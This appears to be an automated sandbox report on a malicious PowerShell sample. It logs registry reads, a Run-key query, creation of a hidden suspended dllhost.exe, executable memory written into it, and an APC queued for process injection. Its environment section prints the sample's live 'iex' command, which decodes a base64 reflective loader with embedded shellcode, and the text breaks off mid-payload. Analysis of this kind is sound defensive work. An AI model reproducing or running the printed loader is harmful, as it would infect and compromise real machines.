Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 6 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 3 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1 Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = f, data = 0 False 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\syswow64\dllhost.exe os_pid = 0xa94, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1 Fn
Thread (2)
Operation Process Additional Information Success Count
Queue APC c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0xa88 True 1
Resume c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0xa88 True 1
Memory (2)
Operation Process Additional Information Success Count
Allocate C:\Windows\syswow64\dllhost.exe address = 0x60000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15108 True 1
Write C:\Windows\syswow64\dllhost.exe address = 0x60000, size = 15108 True 1
Module (108)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x765b0000 True 1
Load ntdll.dll base_address = 0x77560000 True 1
Load WS2_32.dll base_address = 0x75380000 True 1
Load SHLWAPI.dll base_address = 0x77100000 True 1
Load WININET.dll base_address = 0x76be0000 True 1
Load RPCRT4.dll base_address = 0x753c0000 True 1
Load imagehlp.dll base_address = 0x75760000 True 1
Load USERENV.dll base_address = 0x74a50000 True 1
Load ADVAPI32.dll base_address = 0x76760000 True 1
Load ole32.dll base_address = 0x75570000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 3
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75120000 True 1
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Get Handle WS2_32.dll base_address = 0x75380000 True 1
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Get Handle WININET.dll base_address = 0x76be0000 True 1
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Get Handle imagehlp.dll base_address = 0x75760000 True 1
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x74a50000 True 1
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Get Handle c:\windows\syswow64\windowspowershell\v1.0\powershell.exe base_address = 0x22550000 True 1
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 2048 True 1
Get Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x765c435f True 1
Get Address c:\windows\syswow64\user32.dll function = CallWindowProcA, address_out = 0x7514792f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 2
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 2
Get Address Unknown module name function = 16, address_out = 0x75386b0e True 2
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7712c45b True 2
Get Address Unknown module name function = InternetCrackUrlA, address_out = 0x76bed075 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 2
Get Address Unknown module name function = CheckSumMappedFile, address_out = 0x75768303 True 2
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x74a51a7a True 2
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 2
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7558b636 True 2
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x7757fa98 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x7757ff14 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77593164 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Get Address Unknown module name function = 115, address_out = 0x75383ab2 True 1
Get Address Unknown module name function = 3, address_out = 0x75383918 True 1
Get Address Unknown module name function = 19, address_out = 0x75386f01 True 1
Get Address Unknown module name function = 4, address_out = 0x75386bdd True 1
Get Address Unknown module name function = 52, address_out = 0x75397673 True 1
Get Address Unknown module name function = 23, address_out = 0x75383eb8 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7712ecc7 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x771100aa True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x7710d11c True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x7710c5e6 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x775bd598 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x765c328c True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x765c7a2f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76642c21 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x765c1282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x765c53c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x765e9d3f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x765e276c True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x765dd802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x765dd5b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x765c43ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x765dd9e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x765dd9b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x765c49d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x767746ad True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x767748ef True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x767714b3 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 1
System (6)
Operation Additional Information Success Count
Get Info type = Operating System False 4
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Get Info type = Hardware Information True 1
Environment (88)
Operation Additional Information Success Count
Get Environment String name = MshEnableTrace False 80
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Get Environment String name = HomeDrive, result_out = C: True 1
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Get Environment String name = a True 2
Get Environment String name = a, result_out = iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCx
AKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUF
BVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL